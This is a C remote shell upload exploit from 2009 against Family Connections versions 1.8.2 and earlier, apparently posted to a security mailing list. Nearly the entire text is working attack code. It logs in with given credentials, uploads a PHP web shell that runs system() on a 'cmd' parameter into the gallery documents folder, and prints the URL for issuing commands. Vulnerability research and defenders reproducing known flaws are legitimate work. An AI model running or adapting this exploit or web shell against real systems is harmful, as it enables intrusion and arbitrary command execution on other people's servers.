/* Family Connections <= 1.8.2 - Remote Shell Upload Exploit Author: Salvatore "drosophila" Fresta Contact: drosophilaxxx@xxxxxxxxx Date: 3 April 2009 The following software will upload a simple php shell. To execute remote commands, you must open the file using a browser. gcc rsue.c -o rsue ./rsue localhost /fcms/ user password [*] Connecting... [+] Connected [*] Send login... [+] Login Successful [+] Uploading... [+] Shell uploaded [+] Connection closed Open your browser and go to http://localhost/fcms/gallery/documents/shell.php?cmd=[commands] */ #include <string.h> #include <stdlib.h> #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <netdb.h> int socket_connect(char *server, int port) { int fd; struct sockaddr_in sock; struct hostent *host; memset(&sock, 0, sizeof(sock)); if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1; sock.sin_family = AF_INET; sock.sin_port = htons(port); if(!(host=gethostbyname(server))) return -1; sock.sin_addr = *((struct in_addr *)host->h_addr); if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1; return fd; } int socket_send(int socket, char *buffer, size_t size) { if(socket < 0) return -1; return write(socket, buffer, size) < 0 ? -1 : 0; } char *socket_receive(int socket, int tout) { fd_set input; int ret, byte; char *buffer, *tmp; struct timeval timeout; FD_ZERO(&input); FD_SET(socket, &input); if(tout > 0) { timeout.tv_sec = tout; timeout.tv_usec = 0; } if(socket < 0) return NULL; if(!(buffer = (char *) calloc (0, sizeof (char)))) return NULL; while (1) { if(tout > 0) ret = select(socket + 1, &input, NULL, NULL, &timeout); else ret = select(socket + 1, &input, NULL, NULL, NULL); if (!ret) break; if (ret < 0) return NULL; if(!(tmp = (char *) calloc (1024, sizeof (char)))) return NULL; if ((byte=read(socket, tmp, 1024)) < 0) return NULL; if(!byte) break; if(!(buffer = (char *) realloc(buffer, strlen (buffer) + strlen (tmp)))) return NULL; strncat(buffer, tmp, strlen(buffer)+strlen(tmp)); } return buffer; } void usage(char *bn) { printf("\nFamily Connections <= 1.8.2 - Remote Shell Upload Exploit\n" "Author: Salvatore \"drosophila\" Fresta\n\n" "usage: %s <server> <path> <username> <password>\n" "example: %s localhost /fcms/ admin 123456\n\n", bn, bn); } int main(int argc, char *argv[]) { int sd; char code[] = "--AaB03x\r\n" "Content-Disposition: form-data; name=\"doc\"; filename=\"shell.php\"\r\n" "Content-Type: text/plain\r\n" "\r\n" "<?php echo \"<pre>\"; system($_GET['cmd']); echo \"</pre>\"?>\r\n" "--AaB03x\r\n" "Content-Disposition: form-data; name=\"desc\"\r\n" "\r\n" "description\r\n" "--AaB03x\r\n" "Content-Disposition: form-data; name=\"submitadd\"\r\n" "\r\n" "Submit\r\n" "--AaB03x--\r\n", *buffer = NULL, *rec = NULL, *session = NULL; if(argc < 5) { usage(argv[0]); return -1; } if(!(buffer = (char *)calloc(200+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3])+strlen(argv[4]), sizeof(char)))) { perror("calloc"); return -1; } sprintf(buffer, "POST %sindex.php HTTP/1.1\r\n" "Host: %s\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Content-Length: %d\r\n\r\nuser=%s&pass=%s&submit=Login", argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3], argv[4]); printf("\n[*] Connecting..."); if((sd = socket_connect(argv[1], 80)) < 0) { printf("[-] Connection failed!\n\n"); free(buffer); return -1; } printf("\n[+] Connected" "\n[*] Send login..."); if(socket_send(sd, buffer, strlen(buffer)) < 0) { printf("[-] Sending failed!\n\n"); free(buffer); close(sd); return -1; } if(!(rec = socket_receive(sd, 0))) { printf("[-] Receive failed!\n\n"); free(buffer); close(sd); return -1; } if(!strstr(rec, "Login Successful")) { printf("\n[-] Login Incorrect!\n\n"); free(buffer); close(sd); return -1; } session = strstr(rec, "PHPSESSID"); session = strtok(session, ";"); if((sd = socket_connect(argv[1], 80)) < 0) { printf("[-] Connection failed!\n\n"); free(buffer); return -1; } printf("\n[+] Login Successful" "\n[+] Uploading..."); sprintf(buffer, "POST %sdocuments.php HTTP/1.1\r\n" "Host: %s\r\n" "Cookie: %s\r\n" "Content-type: multipart/form-data, boundary=AaB03x\r\n" "Content-Length: %d\r\n\r\n%s", argv[2], argv[1], session, strlen(code), code); if(socket_send(sd, buffer, strlen(buffer)) < 0) { printf("[-] Sending failed!\n\n"); free(buffer); close(sd); return -1; } if(!(rec = socket_receive(sd, 0))) { printf("[-] Receive failed!\n\n"); free(buffer); close(sd); return -1; } if(!strstr(rec, "Uploaded Successfully")) { printf("\n[-] Upload failed!\n\n"); free(buffer); close(sd); return -1; } free(buffer); close(sd); printf("\n[+] Shell uploaded" "\n[+] Connection closed\n\n" "Open your browser and go to http://%s%sgallery/documents/shell.php?cmd=[commands]\n\n", argv[1], argv[2]); return 0; } -- Salvatore "drosophila" Fresta CWNP444351
Attachment:
rsue.c
Description: Binary data